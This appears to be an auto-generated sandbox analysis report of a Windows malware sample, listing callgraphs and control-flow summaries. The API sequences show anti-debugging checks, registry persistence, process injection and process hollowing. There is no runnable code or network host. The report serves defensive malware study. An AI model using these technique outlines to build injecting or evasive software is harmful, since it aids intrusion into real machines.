7ff6c5db14ec LoadLibraryA GetProcAddress 1036->1269 1038 7ff6c5db1a4f 1270 7ff6c5db14ec LoadLibraryA GetProcAddress 1038->1270 1040 7ff6c5db1a69 1271 7ff6c5db14ec LoadLibraryA GetProcAddress 1040->1271 1042 7ff6c5db1a83 1272 7ff6c5db14ec LoadLibraryA GetProcAddress 1042->1272 1044 7ff6c5db1a9d 1273 7ff6c5db14ec LoadLibraryA GetProcAddress 1044->1273 1046 7ff6c5db1ab7 1274 7ff6c5db14ec LoadLibraryA GetProcAddress 1046->1274 1048 7ff6c5db1ad1 1275 7ff6c5db14ec LoadLibraryA GetProcAddress 1048->1275 1050 7ff6c5db1aeb 1276 7ff6c5db14ec LoadLibraryA GetProcAddress 1050->1276 1052 7ff6c5db1b05 1277 7ff6c5db14ec LoadLibraryA GetProcAddress 1052->1277 1054 7ff6c5db1b1f 1278 7ff6c5db14ec LoadLibraryA GetProcAddress 1054->1278 1056 7ff6c5db1b39 1279 7ff6c5db14ec LoadLibraryA GetProcAddress 1056->1279 1058 7ff6c5db1b53 1280 7ff6c5db14ec LoadLibraryA GetProcAddress 1058->1280 1060 7ff6c5db1b6d 1281 7ff6c5db14ec LoadLibraryA GetProcAddress 1060->1281 1062 7ff6c5db1b87 1282 7ff6c5db14ec LoadLibraryA GetProcAddress 1062->1282 1064 7ff6c5db1ba1 1283 7ff6c5db14ec LoadLibraryA GetProcAddress 1064->1283 1066 7ff6c5db1bbb 1284 7ff6c5db14ec LoadLibraryA GetProcAddress 1066->1284 1068 7ff6c5db1bd5 1285 7ff6c5db14ec LoadLibraryA GetProcAddress 1068->1285 1070 7ff6c5db1bef 1286 7ff6c5db14ec LoadLibraryA GetProcAddress 1070->1286 1072 7ff6c5db1c09 1287 7ff6c5db14ec LoadLibraryA GetProcAddress 1072->1287 1074 7ff6c5db1c23 1288 7ff6c5db14ec LoadLibraryA GetProcAddress 1074->1288 1076 7ff6c5db1c3d 1289 7ff6c5db14ec LoadLibraryA GetProcAddress 1076->1289 1078 7ff6c5db1c57 1290 7ff6c5db14ec LoadLibraryA GetProcAddress 1078->1290 1080 7ff6c5db1c71 1291 7ff6c5db14ec LoadLibraryA GetProcAddress 1080->1291 1082 7ff6c5db1c8b 1292 7ff6c5db14ec LoadLibraryA GetProcAddress 1082->1292 1084 7ff6c5db1ca5 1293 7ff6c5db14ec LoadLibraryA GetProcAddress 1084->1293 1086 7ff6c5db1cbf 1294 7ff6c5db14ec LoadLibraryA GetProcAddress 1086->1294 1088 7ff6c5db1cd9 1295 7ff6c5db14ec LoadLibraryA GetProcAddress 1088->1295 1090 7ff6c5db1cf3 1296 7ff6c5db14ec LoadLibraryA GetProcAddress 1090->1296 1092 7ff6c5db1d0d 1297 7ff6c5db14ec LoadLibraryA GetProcAddress 1092->1297 1094 7ff6c5db1d27 1298 7ff6c5db14ec LoadLibraryA GetProcAddress 1094->1298 1096 7ff6c5db1d41 1299 7ff6c5db14ec LoadLibraryA GetProcAddress 1096->1299 1098 7ff6c5db1d5b 1300 7ff6c5db14ec LoadLibraryA GetProcAddress 1098->1300 1100 7ff6c5db1d75 1301 7ff6c5db14ec LoadLibraryA GetProcAddress 1100->1301 1102 7ff6c5db1d8f 1302 7ff6c5db14ec LoadLibraryA GetProcAddress 1102->1302 1104 7ff6c5db1da9 1303 7ff6c5db14ec LoadLibraryA GetProcAddress 1104->1303 1106 7ff6c5db1dc3 1304 7ff6c5db14ec LoadLibraryA GetProcAddress 1106->1304 1108 7ff6c5db1ddd 1305 7ff6c5db14ec LoadLibraryA GetProcAddress 1108->1305 1110 7ff6c5db1df7 1306 7ff6c5db14ec LoadLibraryA GetProcAddress 1110->1306 1112 7ff6c5db1e11 1307 7ff6c5db14ec LoadLibraryA GetProcAddress 1112->1307 1114 7ff6c5db1e2b 1308 7ff6c5db14ec LoadLibraryA GetProcAddress 1114->1308 1116 7ff6c5db1e45 1309 7ff6c5db14ec LoadLibraryA GetProcAddress 1116->1309 1118 7ff6c5db1e5f 1310 7ff6c5db14ec LoadLibraryA GetProcAddress 1118->1310 1120 7ff6c5db1e79 1311 7ff6c5db14ec LoadLibraryA GetProcAddress 1120->1311 1122 7ff6c5db1e93 1312 7ff6c5db14ec LoadLibraryA GetProcAddress 1122->1312 1124 7ff6c5db1ead 1313 7ff6c5db14ec LoadLibraryA GetProcAddress 1124->1313 1126 7ff6c5db1ec7 1314 7ff6c5db14ec LoadLibraryA GetProcAddress 1126->1314 1128 7ff6c5db1ee1 1315 7ff6c5db14ec LoadLibraryA GetProcAddress 1128->1315 1130 7ff6c5db1efb 1316 7ff6c5db14ec LoadLibraryA GetProcAddress 1130->1316 1132 7ff6c5db1f15 1317 7ff6c5db14ec LoadLibraryA GetProcAddress 1132->1317 1134 7ff6c5db1f2f 1318 7ff6c5db14ec LoadLibraryA GetProcAddress 1134->1318 1136 7ff6c5db1f49 1319 7ff6c5db14ec LoadLibraryA GetProcAddress 1136->1319 1138 7ff6c5db1f63 1320 7ff6c5db14ec LoadLibraryA GetProcAddress 1138->1320 1140 7ff6c5db1f7d 1321 7ff6c5db14ec LoadLibraryA GetProcAddress 1140->1321 1142 7ff6c5db1f97 1322 7ff6c5db14ec LoadLibraryA GetProcAddress 1142->1322 1144 7ff6c5db1fb1 1323 7ff6c5db149c LoadLibraryA GetProcAddress 1144->1323 1146 7ff6c5db1fcb 1324 7ff6c5db14ec LoadLibraryA GetProcAddress 1146->1324 1148 7ff6c5db1fe5 1325 7ff6c5db14ec LoadLibraryA GetProcAddress 1148->1325 1150 7ff6c5db1fff 1326 7ff6c5db14ec LoadLibraryA GetProcAddress 1150->1326 1152 7ff6c5db2019 1327 7ff6c5db14ec LoadLibraryA GetProcAddress 1152->1327 1154 7ff6c5db2033 1328 7ff6c5db14ec LoadLibraryA GetProcAddress 1154->1328 1156 7ff6c5db204d 1329 7ff6c5db14ec LoadLibraryA GetProcAddress 1156->1329 1158 7ff6c5db2067 1330 7ff6c5db14ec LoadLibraryA GetProcAddress 1158->1330 1160 7ff6c5db2081 1331 7ff6c5db149c LoadLibraryA GetProcAddress 1160->1331 1162 7ff6c5db209b 1332 7ff6c5db149c LoadLibraryA GetProcAddress 1162->1332 1164 7ff6c5db20b5 1333 7ff6c5db14ec LoadLibraryA GetProcAddress 1164->1333 1166 7ff6c5db20cf 1334 7ff6c5db14ec LoadLibraryA GetProcAddress 1166->1334 1168 7ff6c5db20e9 1335 7ff6c5db14ec LoadLibraryA GetProcAddress 1168->1335 1170 7ff6c5db2103 1336 7ff6c5db14ec LoadLibraryA GetProcAddress 1170->1336 1172 7ff6c5db211d 1337 7ff6c5db14ec LoadLibraryA GetProcAddress 1172->1337 1174 7ff6c5db2137 1338 7ff6c5db14ec LoadLibraryA GetProcAddress 1174->1338 1176 7ff6c5db2151 1177 7ff6c5db31ac IsDebuggerPresent 1176->1177 1178 7ff6c5db31be GetCurrentProcess CheckRemoteDebuggerPresent 1177->1178 1179 7ff6c5db31ba 1177->1179 1178->1179 1179->890 1179->891 1181 7ff6c5db40ca GetTokenInformation 1180->1181 1182 7ff6c5db3431 1180->1182 1339 7ff6c5db3b14 VirtualAlloc 1181->1339 1191 7ff6c5db3ca4 GetModuleFileNameW 1182->1191 1184 7ff6c5db40fb GetTokenInformation 1185 7ff6c5db4142 AdjustTokenPrivileges CloseHandle 1184->1185 1186 7ff6c5db4128 CloseHandle 1184->1186 1340 7ff6c5db3ae4 1185->1340 1187 7ff6c5db3ae4 VirtualFree 1186->1187 1188 7ff6c5db413d 1187->1188 1188->1182 1192 7ff6c5db3ccf PathFindFileNameW wcslen 1191->1192 1193 7ff6c5db3d92 wcsncpy 1191->1193 1194 7ff6c5db3d09 1192->1194 1193->1194 1194->895 1196 7ff6c5db4210 GetLastError 1195->1196 1197 7ff6c5db351d 1195->1197 1196->1197 1198 7ff6c5db421d CloseHandle 1196->1198 1197->926 1197->927 1198->1197 1343 7ff6c5db3884 1199->1343 1201 7ff6c5db321c 1346 7ff6c5db42f4 CreateFileW 1201->1346 1205 7ff6c5db3704 3 API calls 1204->1205 1206 7ff6c5db3a5f 1205->1206 1207 7ff6c5db3884 11 API calls 1206->1207 1208 7ff6c5db3a69 GetModuleFileNameW DeleteFileW CopyFileW 1207->1208 1209 7ff6c5db3557 1208->1209 1210 7ff6c5db3aab SetFileAttributesW 1208->1210 1213 7ff6c5db339c GetVersionExW 1209->1213 1363 7ff6c5db3974 RegOpenKeyExW 1210->1363 1214 7ff6c5db33cd 1213->1214 1214->931 1214->932 1216 7ff6c5db3884 11 API calls 1215->1216 1217 7ff6c5db32ad 1216->1217 1366 7ff6c5db4524 CreateFileW 1217->1366 1219 7ff6c5db3307 CreateThread 1219->919 1220 7ff6c5db32c5 1220->1219 1378 7ff6c5db4084 1220->1378 1224->948 1225->950 1226->952 1227->954 1228->956 1229->958 1230->960 1231->962 1232->964 1233->966 1234->968 1235->970 1236->972 1237->974 1238->976 1239->978 1240->980 1241->982 1242->984 1243->986 1244->988 1245->990 1246->992 1247->994 1248->996 1249->998 1250->1000 1251->1002 1252->1004 1253->1006 1254->1008 1255->1010 1256->1012 1257->1014 1258->1016 1259->1018 1260->1020 1261->1022 1262->1024 1263->1026 1264->1028 1265->1030 1266->1032 1267->1034 1268->1036 1269->1038 1270->1040 1271->1042 1272->1044 1273->1046 1274->1048 1275->1050 1276->1052 1277->1054 1278->1056 1279->1058 1280->1060 1281->1062 1282->1064 1283->1066 1284->1068 1285->1070 1286->1072 1287->1074 1288->1076 1289->1078 1290->1080 1291->1082 1292->1084 1293->1086 1294->1088 1295->1090 1296->1092 1297->1094 1298->1096 1299->1098 1300->1100 1301->1102 1302->1104 1303->1106 1304->1108 1305->1110 1306->1112 1307->1114 1308->1116 1309->1118 1310->1120 1311->1122 1312->1124 1313->1126 1314->1128 1315->1130 1316->1132 1317->1134 1318->1136 1319->1138 1320->1140 1321->1142 1322->1144 1323->1146 1324->1148 1325->1150 1326->1152 1327->1154 1328->1156 1329->1158 1330->1160 1331->1162 1332->1164 1333->1166 1334->1168 1335->1170 1336->1172 1337->1174 1338->1176 1339->1184 1341 7ff6c5db3af5 VirtualFree 1340->1341 1342 7ff6c5db3b08 1340->1342 1341->1342 1342->1182 1352 7ff6c5db3704 GetWindowsDirectoryW 1343->1352 1345 7ff6c5db38b3 8 API calls 1345->1201 1347 7ff6c5db434a 1346->1347 1348 7ff6c5db436b GetLastError 1346->1348 1357 7ff6c5db4244 GetFileSize 1347->1357 1350 7ff6c5db322f CreateThread Sleep CreateThread 1348->1350 1350->930 1353 7ff6c5db374e 1352->1353 1354 7ff6c5db3758 GetVolumeInformationW 1352->1354 1353->1354 1355 7ff6c5db37d4 1354->1355 1356 7ff6c5db383e wsprintfW 1355->1356 1356->1345 1362 7ff6c5db3b14 VirtualAlloc 1357->1362 1359 7ff6c5db4270 1360 7ff6c5db42ba CloseHandle 1359->1360 1361 7ff6c5db4284 SetFilePointer ReadFile 1359->1361 1360->1350 1361->1360 1362->1359 1364 7ff6c5db39b9 RegSetValueExW RegCloseKey 1363->1364 1365 7ff6c5db39b5 1363->1365 1364->1365 1365->1209 1367 7ff6c5db457e 1366->1367 1368 7ff6c5db4585 GetFileSize GetProcessHeap RtlAllocateHeap 1366->1368 1367->1220 1369 7ff6c5db45e0 ReadFile 1368->1369 1370 7ff6c5db45ce CloseHandle 1368->1370 1371 7ff6c5db462f 1369->1371 1372 7ff6c5db4607 GetProcessHeap HeapFree CloseHandle 1369->1372 1370->1367 1373 7ff6c5db4648 GetProcessHeap HeapFree CloseHandle 1371->1373 1375 7ff6c5db4670 1371->1375 1372->1367 1373->1367 1374 7ff6c5db47db GetProcessHeap HeapFree CloseHandle 1374->1367 1375->1374 1376 7ff6c5db472b GetProcessHeap RtlAllocateHeap 1375->1376 1377 7ff6c5db4774 1376->1377 1377->1374 1397 7ff6c5db3fc4 CreateToolhelp32Snapshot 1378->1397 1381 7ff6c5db10d8 OpenProcess 1382 7ff6c5db111f 1381->1382 1383 7ff6c5db1115 1381->1383 1404 7ff6c5db13c4 GetModuleHandleA GetProcAddress 1382->1404 1383->1219 1385 7ff6c5db112c 1385->1383 1386 7ff6c5db11fe VirtualAllocEx 1385->1386 1386->1383 1387 7ff6c5db124f WriteProcessMemory 1386->1387 1387->1383 1388 7ff6c5db1286 WriteProcessMemory 1387->1388 1388->1383 1389 7ff6c5db12d1 1388->1389 1406 7ff6c5db1444 GetSystemInfo 1389->1406 1392 7ff6c5db12fe GetModuleHandleA GetProcAddress 1392->1383 1394 7ff6c5db1338 1392->1394 1393 7ff6c5db1444 GetSystemInfo 1395 7ff6c5db12f4 1393->1395 1394->1383 1396 7ff6c5db1399 CloseHandle 1394->1396 1395->1392 1395->1396 1396->1383 1398 7ff6c5db3fff Process32FirstW 1397->1398 1399 7ff6c5db32f2 1397->1399 1400 7ff6c5db401e wcscmp 1398->1400 1401 7ff6c5db4059 CloseHandle 1398->1401 1399->1381 1402 7ff6c5db4035 1400->1402 1403 7ff6c5db4042 Process32NextW 1400->1403 1401->1399 1402->1401 1403->1400 1403->1401 1405 7ff6c5db13ff 1404->1405 1405->1385 1407 7ff6c5db12ea 1406->1407 1407->1392 1407->1393 1411 7ff6c5db333c 1412 7ff6c5db24cc 37 API calls 1411->1412 1413 7ff6c5db334c 1412->1413 1414 7ff6c5db2e9c CreateMutexA 1415 7ff6c5db2ec1 ReleaseMutex CloseHandle 1414->1415 1416 7ff6c5db2ede GetLastError 1414->1416 1417 7ff6c5db2f20 1415->1417 1418 7ff6c5db2f08 ReleaseMutex CloseHandle 1416->1418 1419 7ff6c5db2eeb ReleaseMutex CloseHandle 1416->1419 1418->1417 1419->1417 1420 7ff6c5db2f2c 1421 7ff6c5db3884 11 API calls 1420->1421 1422 7ff6c5db2f6b 1421->1422 1423 7ff6c5db4524 17 API calls 1422->1423 1424 7ff6c5db2f8f 1423->1424 1425 7ff6c5db4084 5 API calls 1424->1425 1426 7ff6c5db2fb2 1425->1426 1427 7ff6c5db10d8 10 API calls 1426->1427 1428 7ff6c5db2fc7 GetProcessHeap HeapFree 1427->1428 1429 7ff6c5db317c 1430 7ff6c5db3185 1429->1430 1431 7ff6c5db319e 1430->1431 1434 7ff6c5db2ffc 1430->1434 1439 7ff6c5db2dfc CreateMutexA 1434->1439 1437 7ff6c5db3017 Sleep CreateThread WaitForSingleObject 1438 7ff6c5db305c Sleep 1437->1438 1438->1430 1440 7ff6c5db2e45 GetLastError 1439->1440 1441 7ff6c5db2e28 ReleaseMutex CloseHandle 1439->1441 1443 7ff6c5db2e6f ReleaseMutex CloseHandle 1440->1443 1444 7ff6c5db2e52 ReleaseMutex CloseHandle 1440->1444 1442 7ff6c5db2e87 1441->1442 1442->1437 1442->1438 1443->1442 1444->1442 1464 7ff6c5db306c 1469 7ff6c5db3075 1464->1469 1465 7ff6c5db3161 1468 7ff6c5db3be4 RegDeleteKeyW 1468->1469 1469->1465 1469->1468 1470 7ff6c5db3de4 9 API calls 1469->1470 1471 7ff6c5db3974 3 API calls 1469->1471 1473 7ff6c5db4404 CreateFileW 1469->1473 1478 7ff6c5db3b44 RegOpenKeyExW 1469->1478 1470->1469 1472 7ff6c5db3151 Sleep 1471->1472 1472->1469 1474 7ff6c5db445f 1473->1474 1475 7ff6c5db449a 1473->1475 1481 7ff6c5db4384 SetFilePointer WriteFile SetEndOfFile 1474->1481 1475->1469 1477 7ff6c5db447b SetFileAttributesW CloseHandle 1477->1475 1479 7ff6c5db3bd2 1478->1479 1480 7ff6c5db3b98 RegSetValueExW RegCloseKey 1478->1480 1479->1469 1480->1479 1481->1477

                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                                        callgraph 0 Function_00007FF6C5DB4524 63 Function_00007FF6C5DB44B4 0->63 1 Function_00007FF6C5DB3C24 2 Function_00007FF6C5DBE12F 3 Function_00007FF6C5DB3A34 8 Function_00007FF6C5DB3704 3->8 73 Function_00007FF6C5DB3884 3->73 91 Function_00007FF6C5DB3974 3->91 4 Function_00007FF6C5DBE129 5 Function_00007FF6C5DB2F2C 5->0 5->1 32 Function_00007FF6C5DB10D8 5->32 5->73 74 Function_00007FF6C5DB4084 5->74 6 Function_00007FF6C5DB1000 7 Function_00007FF6C5DB4404 75 Function_00007FF6C5DB4384 7->75 48 Function_00007FF6C5DB36D4 8->48 9 Function_00007FF6C5DBBBF9 10 Function_00007FF6C5DBC4F8 11 Function_00007FF6C5DBBBF7 12 Function_00007FF6C5DB2FFC 13 Function_00007FF6C5DB2DFC 12->13 14 Function_00007FF6C5DBBBFB 15 Function_00007FF6C5DBEA11 16 Function_00007FF6C5DB3B14 17 Function_00007FF6C5DBE812 18 Function_00007FF6C5DBFD12 19 Function_00007FF6C5DBE408 20 Function_00007FF6C5DB240C 21 Function_00007FF6C5DB320C 34 Function_00007FF6C5DB42F4 21->34 21->73 22 Function_00007FF6C5DB340C 22->3 22->21 28 Function_00007FF6C5DB41E4 22->28 47 Function_00007FF6C5DB3ED4 22->47 54 Function_00007FF6C5DB40A4 22->54 55 Function_00007FF6C5DB3CA4 22->55 59 Function_00007FF6C5DB339C 22->59 60 Function_00007FF6C5DB329C 22->60 68 Function_00007FF6C5DB31AC 22->68 104 Function_00007FF6C5DB153C 22->104 23 Function_00007FF6C5DBD70A 24 Function_00007FF6C5DBCCE1 25 Function_00007FF6C5DBD2E5 26 Function_00007FF6C5DB3DE4 27 Function_00007FF6C5DB3BE4 29 Function_00007FF6C5DB3AE4 30 Function_00007FF6C5DBC2E4 31 Function_00007FF6C5DBD2E2 32->6 42 Function_00007FF6C5DB13C4 32->42 98 Function_00007FF6C5DB1444 32->98 33 Function_00007FF6C5DC02F0 99 Function_00007FF6C5DB4244 34->99 35 Function_00007FF6C5DBD2E9 36 Function_00007FF6C5DBF4E9 37 Function_00007FF6C5DBD2E7 38 Function_00007FF6C5DBF4E7 39 Function_00007FF6C5DB14EC 40 Function_00007FF6C5DBF4EB 41 Function_00007FF6C5DB3FC4 43 Function_00007FF6C5DB35B9 44 Function_00007FF6C5DBBFB8 45 Function_00007FF6C5DB36BC 46 Function_00007FF6C5DBD7BB 49 Function_00007FF6C5DBB0D5 50 Function_00007FF6C5DBB2C8 51 Function_00007FF6C5DB24CC 51->20 83 Function_00007FF6C5DB248C 51->83 113 Function_00007FF6C5DB244C 51->113 52 Function_00007FF6C5DBF1A1 53 Function_00007FF6C5DB369E 54->16 54->29 56 Function_00007FF6C5DBE7A5 57 Function_00007FF6C5DBE796 58 Function_00007FF6C5DB149C 60->0 60->1 60->32 60->73 60->74 61 Function_00007FF6C5DB2E9C 62 Function_00007FF6C5DBCE9D 64 Function_00007FF6C5DBDEB4 65 Function_00007FF6C5DBE9B3 66 Function_00007FF6C5DBFAB3 67 Function_00007FF6C5DBE9A9 69 Function_00007FF6C5DB36AC 70 Function_00007FF6C5DC00AA 71 Function_00007FF6C5DBB180 72 Function_00007FF6C5DB147F 73->8 74->41 76 Function_00007FF6C5DBB778 77 Function_00007FF6C5DBB277 78 Function_00007FF6C5DBB776 79 Function_00007FF6C5DB337C 79->51 80 Function_00007FF6C5DB317C 80->12 81 Function_00007FF6C5DBF67D 82 Function_00007FF6C5DB1088 84 Function_00007FF6C5DB2160 85 Function_00007FF6C5DBB061 86 Function_00007FF6C5DBE465 87 Function_00007FF6C5DBEB58 88 Function_00007FF6C5DBFD58 89 Function_00007FF6C5DB335C 89->51 90 Function_00007FF6C5DBB05A 92 Function_00007FF6C5DBC874 93 Function_00007FF6C5DBB772 94 Function_00007FF6C5DB306C 94->7 94->26 94->27 94->91 100 Function_00007FF6C5DB3B44 94->100 95 Function_00007FF6C5DBFA6D 96 Function_00007FF6C5DBE46C 97 Function_00007FF6C5DC0340 99->16 101 Function_00007FF6C5DBDB44 102 Function_00007FF6C5DBF443 103 Function_00007FF6C5DBC038 104->39 104->58 105 Function_00007FF6C5DB333C 105->51 106 Function_00007FF6C5DBE151 107 Function_00007FF6C5DBB250 108 Function_00007FF6C5DBC14F 109 Function_00007FF6C5DBB04E 110 Function_00007FF6C5DBE155 111 Function_00007FF6C5DBE454 112 Function_00007FF6C5DBB052 114 Function_00007FF6C5DB354D

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 00007FF6C5DB24CC Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 231 7ff6c5db24cc-7ff6c5db2546 GetModuleFileNameW 232 7ff6c5db2548 231->232 233 7ff6c5db254d-7ff6c5db2589 231->233 234 7ff6c5db2df1-7ff6c5db2df9 232->234 235 7ff6c5db25a1-7ff6c5db25bd call 7ff6c5db240c 233->235 236 7ff6c5db258b-7ff6c5db2593 233->236 245 7ff6c5db2600-7ff6c5db260a 235->245 237 7ff6c5db25bf-7ff6c5db25db call 7ff6c5db244c 236->237 238 7ff6c5db2595-7ff6c5db259d 236->238 237->245 240 7ff6c5db259f-7ff6c5db25fb 238->240 241 7ff6c5db25dd-7ff6c5db25f9 call 7ff6c5db248c 238->241 240->234 241->245 249 7ff6c5db2611-7ff6c5db2665 CreateProcessW 245->249 250 7ff6c5db260c 245->250 251 7ff6c5db2667 249->251 252 7ff6c5db266c-7ff6c5db26ac CreateFileW 249->252 250->234 251->234 253 7ff6c5db26ae 252->253 254 7ff6c5db26b3-7ff6c5db26cf GetFileSize 252->254 253->234 255 7ff6c5db26d1-7ff6c5db26d9 254->255 256 7ff6c5db26db-7ff6c5db26e6 CloseHandle 254->256 255->256 257 7ff6c5db26eb-7ff6c5db2713 VirtualAlloc 255->257 256->234 258 7ff6c5db2725-7ff6c5db2750 ReadFile 257->258 259 7ff6c5db2715-7ff6c5db2720 CloseHandle 257->259 260 7ff6c5db2775-7ff6c5db27c3 CloseHandle GetThreadContext 258->260 261 7ff6c5db2752-7ff6c5db2770 VirtualFree CloseHandle 258->261 259->234 262 7ff6c5db27c5-7ff6c5db27d8 VirtualFree 260->262 263 7ff6c5db27dd-7ff6c5db2862 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 260->263 261->234 262->234 264 7ff6c5db2864-7ff6c5db2877 VirtualFree 263->264 265 7ff6c5db287c-7ff6c5db28e5 VirtualAllocEx 263->265 264->234 266 7ff6c5db28ff-7ff6c5db2933 WriteProcessMemory 265->266 267 7ff6c5db28e7-7ff6c5db28fa VirtualFree 265->267 268 7ff6c5db2935-7ff6c5db2948 VirtualFree 266->268 269 7ff6c5db294d-7ff6c5db2958 266->269 267->234 268->234 270 7ff6c5db296a-7ff6c5db297d 269->270 271 7ff6c5db2983-7ff6c5db2a0c WriteProcessMemory 270->271 272 7ff6c5db2a2b-7ff6c5db2a72 270->272 273 7ff6c5db2a0e-7ff6c5db2a21 VirtualFree 271->273 274 7ff6c5db2a26 271->274 275 7ff6c5db2a84-7ff6c5db2a97 272->275 273->234 274->270 277 7ff6c5db2d1c-7ff6c5db2da0 WriteProcessMemory SetThreadContext 275->277 278 7ff6c5db2a9d-7ff6c5db2aec RtlCompareMemory 275->278 279 7ff6c5db2da2-7ff6c5db2db5 VirtualFree 277->279 280 7ff6c5db2db7-7ff6c5db2dc7 ResumeThread 277->280 281 7ff6c5db2af0-7ff6c5db2b19 278->281 282 7ff6c5db2aee 278->282 279->234 284 7ff6c5db2dde-7ff6c5db2deb VirtualFree 280->284 285 7ff6c5db2dc9-7ff6c5db2ddc VirtualFree 280->285 286 7ff6c5db2b24-7ff6c5db2b32 281->286 282->275 284->234 285->234 287 7ff6c5db2b38-7ff6c5db2bc3 286->287 288 7ff6c5db2d17 286->288 289 7ff6c5db2bd5-7ff6c5db2be3 287->289 288->277 290 7ff6c5db2d12 289->290 291 7ff6c5db2be9-7ff6c5db2c1c 289->291 290->286 292 7ff6c5db2c20-7ff6c5db2cf3 ReadProcessMemory WriteProcessMemory 291->292 293 7ff6c5db2c1e 291->293 295 7ff6c5db2cf5-7ff6c5db2d08 VirtualFree 292->295 296 7ff6c5db2d0d 292->296 293->289 295->234 296->290
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: 9ed2f4a03b1e77c642c8ce9e68d8b0e50f1c48e3ba166c1d4b396193836a5a1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B32D972608BC186E774DF15E8547AAB7A1FB88B85F404235DACE83B58DF3CE8448B04
                                                                                                                                                                                                                        Function 00007FF6C5DB340C Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 297 7ff6c5db340c-7ff6c5db3422 call 7ff6c5db153c call 7ff6c5db31ac 302 7ff6c5db3424-7ff6c5db3426 ExitProcess 297->302 303 7ff6c5db342c-7ff6c5db345a call 7ff6c5db40a4 call 7ff6c5db3ca4 call 7ff6c5db3ed4 297->303 310 7ff6c5db345c-7ff6c5db346d call 7ff6c5db41e4 303->310 311 7ff6c5db34ab-7ff6c5db34be call 7ff6c5db3ed4 303->311 318 7ff6c5db346f-7ff6c5db3480 call 7ff6c5db41e4 310->318 319 7ff6c5db3482-7ff6c5db3484 ExitProcess 310->319 316 7ff6c5db34c0-7ff6c5db34d1 call 7ff6c5db41e4 311->316 317 7ff6c5db34fc-7ff6c5db350f call 7ff6c5db3ed4 311->317 326 7ff6c5db34d3-7ff6c5db34d5 ExitProcess 316->326 327 7ff6c5db34db call 7ff6c5db320c 316->327 329 7ff6c5db3511-7ff6c5db3522 call 7ff6c5db41e4 317->329 330 7ff6c5db3552-7ff6c5db3568 call 7ff6c5db3a34 call 7ff6c5db339c 317->330 318->319 328 7ff6c5db348a call 7ff6c5db329c 318->328 335 7ff6c5db34e0-7ff6c5db34e5 327->335 337 7ff6c5db348f-7ff6c5db3494 328->337 344 7ff6c5db3524-7ff6c5db3526 ExitProcess 329->344 345 7ff6c5db352c call 7ff6c5db320c 329->345 349 7ff6c5db35be-7ff6c5db3696 CreateThread * 3 WaitForMultipleObjects ExitProcess 330->349 350 7ff6c5db356a-7ff6c5db357b call 7ff6c5db41e4 330->350 339 7ff6c5db34f4-7ff6c5db34f6 ExitProcess 335->339 340 7ff6c5db34e7-7ff6c5db34f2 Sleep 335->340 342 7ff6c5db34a3-7ff6c5db34a5 ExitProcess 337->342 343 7ff6c5db3496-7ff6c5db34a1 Sleep 337->343 340->335 343->337 348 7ff6c5db3531-7ff6c5db3536 345->348 351 7ff6c5db3545-7ff6c5db3547 ExitProcess 348->351 352 7ff6c5db3538-7ff6c5db3543 Sleep 348->352 355 7ff6c5db3590-7ff6c5db3592 ExitProcess 350->355 356 7ff6c5db357d-7ff6c5db358e call 7ff6c5db41e4 350->356 352->348 356->355 359 7ff6c5db3598 call 7ff6c5db329c 356->359 361 7ff6c5db359d-7ff6c5db35a2 359->361 362 7ff6c5db35b1-7ff6c5db35b3 ExitProcess 361->362 363 7ff6c5db35a4-7ff6c5db35af Sleep 361->363 363->361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
